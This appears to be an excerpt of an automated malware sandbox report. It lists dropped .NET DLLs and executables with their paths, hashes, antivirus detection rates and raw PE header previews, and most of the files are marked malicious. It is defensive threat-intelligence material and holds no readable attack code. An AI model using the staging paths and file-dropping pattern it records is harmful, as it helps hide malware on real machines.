                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                      C:\Users\user\Desktop\aMYstPaD.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      • Antivirus: Virustotal, Detection: 6%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                      C:\Users\user\Desktop\avRZftgA.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                      • Antivirus: Virustotal, Detection: 20%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                      C:\Users\user\Desktop\dOeQuOYP.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34304
                                                                                      Entropy (8bit):5.618776214605176
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\dxDIAclw.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34816
                                                                                      Entropy (8bit):5.636032516496583
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\hWbZPhSL.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\jHHpWudE.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\kekpPWli.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                      C:\Users\user\Desktop\nxxgerdx.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38400
                                                                                      Entropy (8bit):5.699005826018714
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\pRCorSBW.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34304
                                                                                      Entropy (8bit):5.618776214605176
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\pzkPzahs.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\sYzxNlvS.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\tqaFGXil.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):64000
                                                                                      Entropy (8bit):5.857602289000348
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\vJfNUyGL.log

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Users\user\Desktop\ylcWNDYf.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):38912
                                                                                      Entropy (8bit):5.679286635687991
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                      C:\Windows\CbsTemp\d6e33f2cde6d42

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):50
                                                                                      Entropy (8bit):4.918562939644916
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:AjOxR03VNNA5BSq3:AjaKA5j3
                                                                                      MD5:793BD9600A204E94538BCFBB85574546
                                                                                      SHA1:BDF859CA7CF9DC8145A3A205046AD5FF2D871BFB
                                                                                      SHA-256:DC584A17D24C92481253352AA78DB1210C41F82ACB5081E59E491A3E01648F4D
                                                                                      SHA-512:14E0649A6D0EBC89E3AABE2C878357104ADBB310078C1EF60FE90D85C69D264263BBAE9D198CA444A5EF66C77CC54B1B04A930DF8B88AA1E1C6B58059754EEB0
                                                                                      Malicious:false
                                                                                      Preview:D11yIzdIT3kMfNkb2krW7GniOj6yjqzphbydHvweHtSGdwODxf

                                                                                      C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      C:\Windows\Help\mui\d6e33f2cde6d42

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with very long lines (558), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):558
                                                                                      Entropy (8bit):5.883085633167816
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Lp1rzBjm5Wa6OEJ9RiopHRTOcThhLiTCfDObT9X2DOkh8Uz2m13c1ZO:LPBCIa+eopxZStBX2Dr8Un1MHO
                                                                                      MD5:158B17F625B2FDF42D681C337A80D47A
                                                                                      SHA1:63633B90E2F0D18F061265A72C04A1B7F12E7641
                                                                                      SHA-256:E15142DC8506F8BFD9612664E8BDD49E6DF6D6DAA2B4A3E9ECA6E97BE3BCD38E
                                                                                      SHA-512:22D40AB75543051C94B04778FD43E8AF63369BB22EE2B5C873A377C4267B919484114321D12C3DDF2782FABCF4AD9915C53EC53DCDA328BAB5BF1EABE4564A9A
                                                                                      Malicious:false
                                                                                      Preview:3oimD5pDZHTGxNPNxhFcV2BEtAPVW0OyLOkcKpChGLoqL0CM61JrOHNBne3DpUqi2f5jmxDHehWKNU338DZfqhkEBiyqw92weGxp5cjIxBMrvCySk9Fm4L1U50hD8XUfokqGhN8fdQroV2T8ugFw3Q1SPcuE5gKarrCKWruXBkIneM9ChjTcShlYsX1Fd4k7GQ7n0IlCvrvTHNxCcrgVNrIJGnc8zp4HALhOOVLZ7QrkwRRekzmvXOuZIyhNpmNFxnT5qjyGgGY7AiWzV7YADJtwbHGZy7tUCmwI7VxAAfPRzxZjcs2rNMCo3heidYRiWD4YvN19JY9h3c6osg7GFBG0jIPa1PhmNq4v2ByP02izMeubl0z7bLcU7Dym8aI41XTNiKvrrsPNdQnFYyzAZjKCOjyzMMQatn8yKh2aFIPt5O1qatOKlIfRNR89V6ffbze0Sy405Y5QUaH9rIYd7GylHrl3i3EInuSFuBXlyXOMMO7wK8RNhBhUB3slNARCUwnjIBPquxoj2mY3tytkl0llN7E0SwXyGL2ZkXoJtkdtW7

                                                                                      C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      \Device\Null

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\w32tm.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):151
                                                                                      Entropy (8bit):4.7878554493447885
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:VLV993J+miJWEoJ8FX+zGTGWrXKNvomJ8XKvj:Vx993DEUv4GqmuXs
                                                                                      MD5:ACEB69B8F8B7C4A37ADB151CB1E2195C
                                                                                      SHA1:9A924E63CCB9E2DC69FB9FF742D44B945DB495B0
                                                                                      SHA-256:944820E41C15B249FCB5C70B2AB8047003FFA2ED22FAC82727377C20165E4C28
                                                                                      SHA-512:F9203448DEDF9DF489C36592FA755025979FE37C88C10EDB43E261D91B3A23D880C8E6E5CBB89959BA6E89F56DA273FAFE82067CAC3C875987A8D856E193C641
                                                                                      Malicious:false
                                                                                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 06/03/2024 11:36:16..11:36:16, error: 0x80072746.11:36:21, error: 0x80072746.

                                                                                      Static File Info

                                                                                      General

